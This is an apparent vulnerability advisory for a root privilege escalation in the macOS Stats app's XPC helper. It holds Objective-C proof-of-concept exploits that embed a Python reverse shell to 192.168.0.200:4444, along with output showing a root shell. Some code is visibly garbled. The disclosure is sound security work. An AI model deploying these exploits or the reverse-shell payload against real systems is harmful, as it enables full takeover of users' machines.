

# Stats < v2.11.22 Local Privilege Escalation

## Description

The Stats application is vulnerable to a local privilege escalation due to the insecure implementation of its XPC service. The application registers a Mach service under the name `eu.exelban.Stats.SMC.Helper`. The associated binary, `eu.exelban.Stats.SMC.Helper`, is a privileged helper tool designed to execute actions requiring elevated privileges on behalf of the client, such as setting fan modes, adjusting fan speeds, and executing the `powermetrics` command.

The root cause of this vulnerability lies in the `shouldAcceptNewConnection` method, which unconditionally returns YES (or true), allowing any XPC client to connect to the service without any form of verification. As a result, unauthorized clients can establish a connection to the Mach service and invoke methods exposed by the HelperTool interface.

```
func listener(_ listener: NSXPCLListener, shouldAcceptNewConnection connection: NSXPCCConnection) -> Bool {
    connection.exportedInterface = NSXPCInterface(with: HelperProtocol.self)
    connection.exportedObject = self
    connection.invalidationHandler = {
        if let connectionIndex = self.connections.firstIndex(of: connection) {
            self.connections.remove(at: connectionIndex)
        }
        if self.connections.isEmpty {
            self.shouldQuit = true
        }
    }

    self.connections.append(connection)
    connection.resume()

    return true
}
```

Among the exposed methods, `setFanMode` and `setFanSpeed` can destabilize the user's device and even pose physical risks, such as overheating or system instability.

```
func setFanMode(id: Int, mode: Int, completion: @escaping (String?) -> Void)
func setFanSpeed(id: Int, value: Int, completion: @escaping (String?) -> Void)
```

The `powermetrics` method is particularly dangerous as it is vulnerable to a `command injection vulnerability`, allowing the execution of arbitrary code with root privileges. This effectively grants attackers full control over the system.

```
func powermetrics(_ samplers: [String], completion: @escaping (String?) -> Void) {
    let result = syncShell("powermetrics -n 1 -s \(samplers.joined(separator: ",")) --sample-rate 1000")
    if let error = result.error, !error.isEmpty {
        NSLog("error call powermetrics: \(error)")
        completion(nil)
        return
    }
    completion(result.output)
}

public func syncShell(_ args: String) -> (output: String?, error: String?) {
    let task = Process()
    task.launchPath = "/bin/sh"
    task.arguments = ["-c", args]

    let outputPipe = Pipe()
    let errorPipe = Pipe()

    defer {
        outputPipe.fileHandleForReading.closeFile()
        errorPipe.fileHandleForReading.closeFile()
    }

    task.standardOutput = outputPipe
    task.standardError = errorPipe

    do {
        try task.run()
    } catch let err {
        return (nil, "syncShell: \(err.localizedDescription)")
    }
}
```

```

let outputData = outputPipe.fileHandleForReading.readDataToEndOfFile()
let errorData = errorPipe.fileHandleForReading.readDataToEndOfFile()
let output = String(data: outputData, encoding: .utf8)
let error = String(data: errorData, encoding: .utf8)

return (output, error)
}

```

Except powermetrics method, command injection can also be achieved by chained call.

The `setSMCPath` method can be used to store an arbitrary command string, which is then directly interpolated into shell commands in both `setFanSpeed` and `setFanMode` methods via the expressions `syncShell("\(smc) fan \(id) -v \(value)")` and `syncShell("\(smc) fan \(id) -m \(mode)")`. This creates additional paths for privilege escalation.

For reference, I've included a proof-of-concept that demonstrates this vulnerability chain:

```

#import <Foundation/Foundation.h>

@protocol HelperProtocol

- (void)versionWithCompletion:(void (^)(NSString * _Nonnull))completion;
- (void)setSMCPath:(NSString * _Nonnull)path;
- (void)setFanModeWithId:(NSInteger)id mode:(NSInteger)mode completion:(void (^)(NSString * _Nullable))completion;
- (void)setFanSpeedWithId:(NSInteger)id value:(NSInteger)value completion:(void (^)(NSString * _Nullable))completion;
- (void)powermetrics:(NSArray<NSString *> * _Nonnull)samplers completion:(void (^)(NSString * _Nullable))completion;
- (void)uninstall;

@end

int main()
{
    NSString* service_name = @"eu.exelban.Stats.SMC.Helper";
    NSXPConnection* connection = [[NSXPConnection alloc] initWithMachServiceName:service_name
options:0x1000];

```

```

NSXPCInterface* interface = [NSXPCInterface interfaceWithProtocol:@protocol(HelperProtocol)];
[connection setRemoteObjectInterface:interface];
[connection resume];
id obj = [connection remoteObjectProxyWithErrorHandler:^NSError* error]
{
    NSLog(@"[-] Something went wrong");
    NSLog(@"[-] Error: %@", error);
}
];
NSLog(@"Objection Info: %@", obj);
NSLog(@"Connection Info: %@", connection);

NSLog(@"Triggering a root reverse shell\n");

NSString* path = @"python3 -c 'import
socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"192.168.0.200\",4444
));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(['/bin/sh','-i']);'";
[obj setSMCPath:path];
sleep(3);
[obj setFanSpeedWithId:1 value:2000 completion:^(NSString * _Nullable result) {
if (result) {
    NSLog(@"Result: %@", result);
} else {
    NSLog(@"An error occurred.");
}
}];
NSLog(@"Enjoy the root shell : )\n");
}

```

```
adler@adlers-Mac-mini:~/Desktop$ gcc -framework Foundation stats.m -o setFanExploit
adler@adlers-Mac-mini:~/Desktop$ ./setFanExploit
2024-12-11 23:11:58.436 setFanExploit[2638:270681] Objection Info: <__NSXPCInterfaceProxy_HelperProtocol: 0x60000049c140>
2024-12-11 23:11:58.436 setFanExploit[2638:270681] Connection Info: <NSXPCConnection: 0x60001694140> connection to service na
2024-12-11 23:11:58.436 setFanExploit[2638:270681] Triggering a root reverse shell
2024-12-11 23:12:01.441 setFanExploit[2638:270681] Enjoy the root shell : )
adler@adlers-Mac-mini:~/Desktop$
```



A screenshot of a terminal window titled "kali@kali: ~". The terminal shows the following session:

```
(kali㉿kali)-[~]
$ nc -nlvp 4444
listening on [any] 4444 ...
connect to [192.168.0.200] from (UNKNOWN) [192.168.0.10] 49503
sh: no job control in this shell
sh-3.2# id
uid=0(root) gid=0(wheel) groups=0(wheel),1(daemon),2(kmem),3(sys),4(tty),5(operator),8(procview),9(procmod),12(everyone),20(s),80(admin),701(com.apple.sharepoint.group.1),33(_appstore),98(_lpadmin),100(_lpoperator),204(_developer),250(_analyticsuse
m.apple.access_screensharing),399(com.apple.access_ssh),400(com.apple.access_remote_ae)
sh-3.2#
```

# Impact

An attacker can exploit this vulnerability to modify the hardware settings of the user's device and execute arbitrary code with root privileges.

# Reproduction

To avoid potential hardware damage, this demonstration focuses solely on the attack path to obtain root privileges without altering the device's hardware settings.

Step 1: Below is a custom XPC client (exploit) to demonstrate the issue. Feel free to change the value of `maliciousSamplers` to include different command payloads:

```
#import <Foundation/Foundation.h>

@protocol HelperProtocol

- (void)versionWithCompletion:(void (^)(NSString * _Nonnull))completion;
- (void)setSMCPPath:(NSString * _Nonnull)path;
- (void)setFanModeWithId:(NSInteger)id mode:(NSInteger)mode completion:(void (^)(NSString * _Nullable))completion;
- (void)setFanSpeedWithId:(NSInteger)id value:(NSInteger)value completion:(void (^)(NSString *
```

```

_Nullable))completion;
- (void)powermetrics:(NSArray<NSString *> * _Nonnull)samplers completion:(void (^)(NSString *
_Nullable))completion;
- (void)uninstall;

@end

int main()
{
    NSString* service_name = @"eu.exelban.Stats.SMC.Helper";
    NSXPConnection* connection = [[NSXPConnection alloc] initWithMachServiceName:service_name
options:0x1000];
    NSXPCInterface* interface = [NSXPCInterface interfaceWithProtocol:@protocol(HelperProtocol)];
    [connection setRemoteObjectInterface:interface];
    [connection resume];
    id obj = [connection remoteObjectProxyWithErrorHandler:^(NSError* error)
    {
        NSLog(@"[-] Something went wrong");
        NSLog(@"[-] Error: %@", error);
    }];
    NSLog(@"Objection: %@", obj);
    NSLog(@"Connection: %@", connection);

    NSArray<NSString *> *maliciousSamplers = @[@"cpu_power", @"gpu_power"];
    python3 -c 'import
socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\'192.168.0.200\',4444
));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\'/bin/sh\',\'-i\']);';
    [obj powermetrics:maliciousSamplers completion:^(NSString * _Nullable result) {
        if (result) {
            NSLog(@"Result: %@", result);
        } else {
            NSLog(@"An error occurred.");
        }
    }];
    NSLog(@"Exploitation completed\n");

}

```

Step 2: To simulate an attacker's Command and Control (C2) server, set up a netcat listener on another host.

[image](#) image not found or type unknown

Step 3: Compile and execute the exploit, and we will quickly gain a root reverse shell.

[image](#) image not found or type unknown

[image](#) image not found or type unknown

# Recommendation

Implement robust client verification mechanisms, including [code signing](#) checks and [audit token](#) (PID is not secure) verification. Some good examples of secure client validation can be found in

<https://github.com/imothee/tmpdisk/blob/2572a5e738ba96d1d0ea545d620078410db62148/com.imothee.TmpDiskHelper/XPCServer.swift#L70>, <https://github.com/mhaeuser/Battery-Toolkit/blob/4b9a74bf1c31a57d78eb351b69fe09b861252f60/Common/BTXPCValidation.swift>,  
<https://github.com/duanefields/VirtualKVM/blob/master/VirtualKVM/CodesignCheck.swift>.

---

Revision #2

Created 1 January 2025 21:56:52 by winslow

Updated 1 January 2025 23:03:30 by winslow